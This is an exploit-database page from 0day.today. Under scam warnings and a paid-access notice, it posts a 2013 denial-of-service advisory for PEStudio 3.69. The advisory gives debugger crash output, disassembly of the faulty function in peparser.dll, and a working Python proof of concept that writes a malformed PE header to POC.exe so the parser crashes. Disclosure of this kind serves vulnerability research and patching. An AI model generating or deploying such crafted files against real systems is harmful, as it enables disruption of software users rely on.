0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PEStudio 3.69 - Denial of Service
# Title: PEStudio Version 3.69 Denial of Service # Date: 5th June 2013 # Author: Debasish Mandal ( https://twitter.com/debasishm89 ) # Blog : http://www.debasish.in/ # Software Homepage: http://www.winitor.com/ # Version: PEStudio Version 3.69 # Tested on: Windows XP SP2 / Windows 7 # Vendor Patch : Recently released stable version (v6.91) is not affected. ''' [+] Affected Module : peparser.dll version 3.69 [+] Crash Point: (6b4.17c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141 eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Documents and Settings\debasish mandal\Desktop\Tools\PeStudio369\PeParser.dll - PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0: 3001ce70 8b510c mov edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=???????? 0:000> u eip PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0: 3001ce70 8b510c mov edx,dword ptr [ecx+0Ch] 3001ce73 3bda cmp ebx,edx 3001ce75 7209 jb PeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80) 3001ce77 8b6908 mov ebp,dword ptr [ecx+8] 3001ce7a 03ea add ebp,edx 3001ce7c 3bdd cmp ebx,ebp 3001ce7e 720c jb PeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c) 3001ce80 46 inc esi [+] IDA Pro Snap of the Buggy Function:(Code from peparser.dll version 3.69) .text:3001CE40 sub_3001CE40 proc near ; CODE XREF: sub_30003510+154p .text:3001CE40 ; sub_300184D0+4Bp .text:3001CE40 mov ecx, [ecx+4] .text:3001CE43 xor eax, eax .text:3001CE45 test ecx, ecx .text:3001CE47 jz short locret_3001CE91 .text:3001CE49 mov edx, [ecx+1Ch] .text:3001CE4C movzx ecx, word ptr [edx+14h] .text:3001CE50 lea ecx, [ecx+edx+18h] .text:3001CE54 test ecx, ecx .text:3001CE56 jz short locret_3001CE91 .text:3001CE58 test ebx, ebx .text:3001CE5A jz short locret_3001CE91 .text:3001CE5C push esi .text:3001CE5D push edi .text:3001CE5E movzx edi, word ptr [edx+6] .text:3001CE62 xor esi, esi .text:3001CE64 test edi, edi .text:3001CE66 jle short loc_3001CE8F .text:3001CE68 push ebp .text:3001CE69 lea esp, [esp+0] .text:3001CE70 .text:3001CE70 loc_3001CE70: ; CODE XREF: sub_3001CE40+46j .text:3001CE70 mov edx, [ecx+0Ch] <-- Crash .text:3001CE73 cmp ebx, edx .text:3001CE75 jb short loc_3001CE80 .text:3001CE77 mov ebp, [ecx+8] .text:3001CE7A add ebp, edx .text:3001CE7C cmp ebx, ebp .text:3001CE7E jb short loc_3001CE8C .text:3001CE80 .text:3001CE80 loc_3001CE80: ; CODE XREF: sub_3001CE40+35j .text:3001CE80 inc esi .text:3001CE81 add ecx, 28h .text:3001CE84 cmp esi, edi .text:3001CE86 jl short loc_3001CE70 .text:3001CE88 pop ebp .text:3001CE89 pop edi .text:3001CE8A pop esi .text:3001CE8B retn .text:3001CE8C ; --------------------------------------------------------------------------- [+] Proof of Concept : ''' # /usr/bin/python header = "MZ" header += "A"*58 header += "\x80\x00\x00\x00" header += "A"*3 header += "\x0e" header += "A"*60 header += "PE" header += "A"*235 f = open('POC.exe','wb') f.write(header) f.close() # 0day.today [2024-09-28] #